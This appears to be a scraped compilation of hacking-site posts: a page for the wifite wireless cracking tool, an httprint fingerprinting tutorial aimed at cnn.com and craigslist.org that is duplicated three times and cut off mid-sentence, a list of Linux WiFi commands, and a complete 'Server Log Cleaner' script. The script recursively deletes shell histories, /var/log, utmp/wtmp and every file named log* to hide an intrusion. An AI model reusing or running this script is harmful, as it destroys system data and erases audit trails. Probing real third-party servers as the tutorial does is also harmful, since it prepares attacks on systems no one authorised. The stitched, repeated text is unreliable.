wifite – Automated Wireless (wifi) Attack Auditor

Wifite v2 is now available
Get the latest version on Github
What’s new in this version:
support for cracking WPS-encrypted networks (via reaver)
2 new WEP attacks
more accurate WPA handshake capture
various bug fixes
Version 2 does not include a GUI, so everything must be done at the command-line.
Introduction
Designed and tested on Linux; works with Backtrack 5, BlackBuntu, BackBox, and Pentoo! Linux only; no windows or OSX support (but you’re welcome to try).
Purpose
To attack multiple WEP, WPA, and WPS encrypted networks in a row. This tool is customizable to be automated with only a few arguments. Wifite aims to be the “set it and forget it” wireless auditing tool.
Features
sorts targets by signal strength (in dB); cracks closest access points first
automatically de-authenticates clients of hidden networks to reveal SSIDs
numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc)
customizable settings (timeouts, packets/sec, etc)
“anonymous” feature; changes MAC to a random address before attacking, then changes back when attacks are complete
all captured WPA handshakes are backed up to wifite.py’s current directory
smart WPA de-authentication; cycles between all clients and broadcast deauths
stop any attack with Ctrl+C, with options to continue, move onto next target, skip to cracking, or exit
displays session summary at exit; shows any cracked keys
all passwords saved to cracked.txt
built-in updater: ./wifite.py -upgrade
Requirements
linux operating system (confirmed working on Backtrack 5, BackBox, BlackBuntu, Pentoo, Ubuntu 8.10 (BT4R1), Ubuntu 10.04, Debian 6, Fedora 16)
tested working with python 2.6.x, and python 2.7.x,
wireless drivers patched for monitor mode and injection. Most security distributions (Backtrack, BlackBuntu, etc) come with wireless drivers pre-patched,
aircrack-ng (v1.1) suite: available via apt: apt-get install aircrack-ng or at the aircrack-ng website,
Suggested Applications
reaver, for attacking WPS-encrypted networks
pyrit, cowpatty, tshark: not required, but help verify WPA handshake captures
For help installing any of these programs, see the installation guide (hosted on github)
Execution
Download the latest version:
wget -O wifite.py http://wifite.googlecode.com/svn/trunk/wifite.py
change permissions to executable:
chmod +x wifite.py
execute:
python wifite.py
or, to see a list of commands with info:
./wifite.py -help
Screenshots
successful WEP attack (after 90 seconds):

successful WPS attacks (after 17 hours):

<

Fingerprint Web Servers Using Httprint

If you are following my site, you have undoubtedly read a few ways to identify what system a server is running. Probably the simplest way is to use netcat and connect to port 80 and pull the webserver banner.
The banner is simply the application advertising what it is. Webserver administrators who are vigilant and savvy about security will often suppress or masquerade their banners.
In other words, to throw off hackers, they might replace the banner of, say, Microsoft’s IIS 6.0 with a banner saying it isApache 2.4.0. In that way, hackers will spend their time and effort trying to hack a relatively vulnerable IIS 6.0, get frustrated when it doesn’t work, and eventually go away.
Remember, exploits/hacks are specific to the application and operating system among many factors. That’s why fingerprinting is SO important. A hack that works on IIS 6.0 will NOT likely work on Apache.
In addition, some web administrators will put various load balancing and other devices designed to obscure the identity of the web server (Computer Associates advertises one their products with the tagline, “You can’t hack what you can’t see”).
Fortunately, there are more sophisticated ways of determining what web server is running a website. httpprint is just such a tool, which uses heuristics (an educated guess based upon incomplete, but probably sufficient data) to identify the web server as well as web enabled devices such as printers, routers, switches, etc.

Step 1: Open Httprint
Let’s start by opening httprint. Unfortunately, the GUI in BackTrack points to the wrong directory, so we need to open a terminal and type:
bt > cd /pentest/enumeration/web/httprint/linux

Once we are in the correct directory, let’s open the help screen in httprint.
./httprint -h

About a third of the way down this help screen, you can see the basic syntax for httprint, which is:
httprint -h <host> -s signatures.txt
Where signatures.txt is text file in this directory that contains the signatures of the many types of web servers that httprint uses to determine the identity of the target.
Step 2: Test It in CNN.Com
Let’s test it on cnn.com‘s website.
bt > ./httprint -h 157.166.226.25 -P0 -s signatures.txt
I have added the P0 to suppress the ping (like when using nmap) that often is blocked by network devices and will prohibit us from accessing the web server.
As you can see above, httprint has fingerprinted the site and tells us that cnn.com reports that it is using the nginx webserver, but in reality, is running Microsoft IIS 6.0! Hmm…that is VERY INTERESTING!
Reporting that you are running nginx is a good security strategy for cnn.com as there far fewer known vulnerabilities for nginx than IIS 6.0 This will help to divert most attackers, but not us!
Step 3: Let’s Try Craigslist.org
Let’s try the same on craigslist.org.
bt > ./httprint -h 208.82.238.129 -P0 -s signtaures.txt

httprint tells us that craigslist.org’s website shows a banner saying it is running Apache, but httprint thinks it is Oracle’s Web Logic server. One interesting thing a.

Fingerprint Web Servers Using Httprint

If you are following my site, you have undoubtedly read a few ways to identify what system a server is running. Probably the simplest way is to use netcat and connect to port 80 and pull the webserver banner.
The banner is simply the application advertising what it is. Webserver administrators who are vigilant and savvy about security will often suppress or masquerade their banners.
In other words, to throw off hackers, they might replace the banner of, say, Microsoft’s IIS 6.0 with a banner saying it isApache 2.4.0. In that way, hackers will spend their time and effort trying to hack a relatively vulnerable IIS 6.0, get frustrated when it doesn’t work, and eventually go away.
Remember, exploits/hacks are specific to the application and operating system among many factors. That’s why fingerprinting is SO important. A hack that works on IIS 6.0 will NOT likely work on Apache.
In addition, some web administrators will put various load balancing and other devices designed to obscure the identity of the web server (Computer Associates advertises one their products with the tagline, “You can’t hack what you can’t see”).
Fortunately, there are more sophisticated ways of determining what web server is running a website. httpprint is just such a tool, which uses heuristics (an educated guess based upon incomplete, but probably sufficient data) to identify the web server as well as web enabled devices such as printers, routers, switches, etc.
Step 1: Open Httprint
Let’s start by opening httprint. Unfortunately, the GUI in BackTrack points to the wrong directory, so we need to open a terminal and type:
bt > cd /pentest/enumeration/web/httprint/linux

Once we are in the correct directory, let’s open the help screen in httprint.
./httprint -h

About a third of the way down this help screen, you can see the basic syntax for httprint, which is:
httprint -h <host> -s signatures.txt
Where signatures.txt is text file in this directory that contains the signatures of the many types of web servers that httprint uses to determine the identity of the target.
Step 2: Test It in CNN.Com
Let’s test it on cnn.com‘s website.
bt > ./httprint -h 157.166.226.25 -P0 -s signatures.txt
I have added the P0 to suppress the ping (like when using nmap) that often is blocked by network devices and will prohibit us from accessing the web server.

As you can see above, httprint has fingerprinted the site and tells us that cnn.com reports that it is using the nginx webserver, but in reality, is running Microsoft IIS 6.0! Hmm…that is VERY INTERESTING!
Reporting that you are running nginx is a good security strategy for cnn.com as there far fewer known vulnerabilities for nginx than IIS 6.0 This will help to divert most attackers, but not us!
Step 3: Let’s Try Craigslist.org
Let’s try the same on craigslist.org.
bt > ./httprint -h 208.82.238.129 -P0 -s signtaures.txt

httprint tells us that craigslist.org’s website shows a banner saying it is running Apache, but httprint thinks it is Oracle’s Web Logic server. One interesting thing a.

Fingerprint Web Servers Using Httprint

If you are following my site, you have undoubtedly read a few ways to identify what system a server is running. Probably the simplest way is to use netcat and connect to port 80 and pull the webserver banner.
The banner is simply the application advertising what it is. Webserver administrators who are vigilant and savvy about security will often suppress or masquerade their banners.
In other words, to throw off hackers, they might replace the banner of, say, Microsoft’s IIS 6.0 with a banner saying it isApache 2.4.0. In that way, hackers will spend their time and effort trying to hack a relatively vulnerable IIS 6.0, get frustrated when it doesn’t work, and eventually go away.
Remember, exploits/hacks are specific to the application and operating system among many factors. That’s why fingerprinting is SO important. A hack that works on IIS 6.0 will NOT likely work on Apache.
In addition, some web administrators will put various load balancing and other devices designed to obscure the identity of the web server (Computer Associates advertises one their products with the tagline, “You can’t hack what you can’t see”).
Fortunately, there are more sophisticated ways of determining what web server is running a website. httpprint is just such a tool, which uses heuristics (an educated guess based upon incomplete, but probably sufficient data) to identify the web server as well as web enabled devices such as printers, routers, switches, etc.
Step 1: Open Httprint
Let’s start by opening httprint. Unfortunately, the GUI in BackTrack points to the wrong directory, so we need to open a terminal and type:
bt > cd /pentest/enumeration/web/httprint/linux

Once we are in the correct directory, let’s open the help screen in httprint.
./httprint -h

About a third of the way down this help screen, you can see the basic syntax for httprint, which is:
httprint -h <host> -s signatures.txt
Where signatures.txt is text file in this directory that contains the signatures of the many types of web servers that httprint uses to determine the identity of the target.
Step 2: Test It in CNN.Com
Let’s test it on cnn.com‘s website.
bt > ./httprint -h 157.166.226.25 -P0 -s signatures.txt
I have added the P0 to suppress the ping (like when using nmap) that often is blocked by network devices and will prohibit us from accessing the web server.

As you can see above, httprint has fingerprinted the site and tells us that cnn.com reports that it is using the nginx webserver, but in reality, is running Microsoft IIS 6.0! Hmm…that is VERY INTERESTING!
Reporting that you are running nginx is a good security strategy for cnn.com as there far fewer known vulnerabilities for nginx than IIS 6.0 This will help to divert most attackers, but not us!
Step 3: Let’s Try Craigslist.org
Let’s try the same on craigslist.org.
bt > ./httprint -h 208.82.238.129 -P0 -s signtaures.txt

httprint tells us that craigslist.org’s website shows a banner saying it is running Apache, but httprint thinks it is Oracle’s Web Logic server. One interesting thing a

Useful Linux WiFi Commands

NOTE: NOT ALL CARDS/FIRMWARE SUPPORT ALL OF THE COMMANDS LISTED BELOW.
Note: To connect your Linux machine to a WLAN using WPA, WPA2 or 802.1X you will need to use WPA Supplicant
Connecting to an OPEN / WEP WLAN (DHCP)
Note: replace [interface] with your interface name as required (e.g. eth1, wlan0, ath0 etc.)
iwconfig [interface] mode managed key [WEP key] (128 bit WEP use 26 hex characters, 64 bit WEP uses 10)
iwconfig [Interface] essid “[ESSID]“ (Specify ESSID for the WLAN)
dhclient [interface] (to receive an IP address, netmask, DNS server and default gateway from the Access Point)
ping www.bbc.co.uk  (if you receive a reply you have access)
Connecting to an OPEN / WEP WLAN (Manual IP Setup)
Note: replace [interface] with your interface name as required (e.g. eth1, wlan0, ath0 etc.) It may be necessary to run some packet capture software (e.g. Ethereal) to determine the IP addresses of both the Default Gateway and DNS servers.
iwconfig [interface] mode managed key [WEP key] (128 bit WEP use 26 hex characters, 64 bit WEP uses 10)
iwconfig [interface] essid “[ESSID]“
ifconfig [interface] [IP address] netmask [subnetmask]
route add default gw [IP of default gateway] (Configure your default gateway; usually the IP of the Access Point)
echo nameserver [IP address of DNS server]  >>  /etc/resolve.conf (Configure your DNS server)
ping www.bbc.co.uk (if you receive a reply you have access)
iwconfig Commands
Note: replace [interface] with your interface name as required (e.g. eth1, wlan0, ath0 etc.)
iwconfig [interface] mode master (set the card to act as an access point mode)
iwconfig [interface] mode managed (set card to client mode on a network with an access point)
iwconfig [interface] mode ad-hoc (set card to peer to peer networking or no access point mode)
iwconfig [interface] mode monitor (set card to RFMON mode our favourite)
iwconfig [interface] essid any (with some cards you may  disable the  ESSID  checking)
iwconfig [interface] essid “your ssid_here” (configure ESSID for network)
iwconfig [interface] key 1111-1111-1111-1111 (set 128 bit WEP key)
iwconfig [interface] key 11111111 (set 64 bit WEP key)
iwconfig [interface] key s:mykey (set key as an ASCII string)
iwconfig [interface] key off (disable WEP key)
iwconfig [interface] key open (sets open mode, no authentication is used and card may accept non-encrypted sessions)
iwconfig [interface] channel [channel no.] (set a channel 1-14)
iwconfig [interface] channel auto (automatic channel selection)
iwconfig [interface] freq 2.422G (channels can also be specified in GHz)
iwconfig [interface] ap 11:11:11:11:11:11 (Force card to register AP address)
iwconfig [interface] rate 11M (card will use the rate specified)
iwconfig [interface] rate auto (select automatic rate)
iwconfig [interface] rate auto 5.5M (card will use the rate specified and any rate below as required)
ifconfig Commands
Note: replace [interface] with your interface name as required (e.g. eth1, wlan0, ath0 etc.)
ifconfig [interface] up (bring up specified interface)
ifconfig [interface] down (take down specified interface)
ifconfig [interface] [IP address] netmask [subnet-mask] (manually set IP and subnet-mask details)
ifconfig [interface] hw ether [MAC] (Change the wireless cards MAC address, specify in format 11:11:11:11:11:11)
iwpriv Commands
Note: replace [interface] with your interface name as required (e.g. eth1, wlan0, ath0 etc.)
iwpriv [interface] hostapd 1 (used to set card mode to hostapd e.g. for void11)
When the monitor mode patch is installed as per the Wireless Build HOWTO the following commands may be used to set the card into monitor mode.
iwpriv [interface] monitor [A] [B]
[A]
0 = disable monitor mode
1 = enable monitor mode with Prism2 header
2 = enable monitor mode with no Prism2
[B]
Channel to monitor (1-14)
iwlist Commands
Note: replace [interface] with your interface name as required (e.g. eth1, wlan0, ath0 etc.) iwlist is used to display some large chunk of information from a wireless network interface that is not displayed by iwconfig.
iwlist [interface] scan (Give the list of Access Points and Ad-Hoc cells in range (ESSID, Quality, Frequency, Mode etc.) Note: In tests only worked with Atheros cards).
iwlist [interface] channel (Give the list of available frequencies in the device and the number of channels).
iwlist [interface] rate (List the bit-rates supported by the device).
iwlist [interface] key (List the encryption key sizes supported and display all the encryption keys available in the device).
iwlist [interface] power (List the various Power Management attributes and modes of the device).
iwlist [interface] txpower (List the various Transmit Power available on the device).
iwlist [interface] retry (List the transmit retry limits and retry lifetime on the device).
iwlist [interface] ap (Give the list of Access Points in range, and optionally the quality of link to them.  Deprecated in favour of scan)
iwlist [interface] peers (Give the list of Peers associated/registered with this card).
iwlist [interface] event (List the wireless events supported by this card).
Madwifi-ng Commands
MADWiFi supports virtual access points (VAPS), which means you can create more than one wireless device per wireless card (the host wireless card = wifi0).
By default, a sta mode VAP is created by, which is MadWifi talk for a ‘managed mode wireless interface’.
Note: replace athx with your interface name as required (e.g. ath0, ath1)
wlanconfig athx destroy (Destroy VAP, athx)
wlanconfig athx create wlandev wifi0 wlanmode sta (Create a managed mode VAP, athx)
wlanconfig athx create wlandev wifi0 wlanmode ap (Create an Access Point VAP, athx)
wlanconfig athx create wlandev wifi0 wlanmode adhoc (Create an Ad-Hoc VAP, athx)
wlanconfig athx create wlandev wifi0 wlanmode monitor (Create a Monitor mode VAP, athx)
Changing modes:
ifconfig athx down (Take the VAP down)
wlanconfig athx destroy (Destroy the VAP, athx)
wlanconfig athx create wlandev wifi0 wlanmode [sta|adhoc|ap|monitor] (Create a new sta, adhoc, ap or monitor VAP)
Scan for Access Points (requires both steps):
modprobe wlan_scan_sta (To insert the scanning module)
wlanconfig athx list scan (To list the APs)

Server Log Cleaner Linux

#!/bin/sh
# Coded By Red H4t V!per (Vanda)
# chmod 0755 scriptname.sh >> ./scriptname.sh

echo "[*] Going TO Delete Log Servers ... "
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;
rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp

echo "[*] Done . Good Luck;)"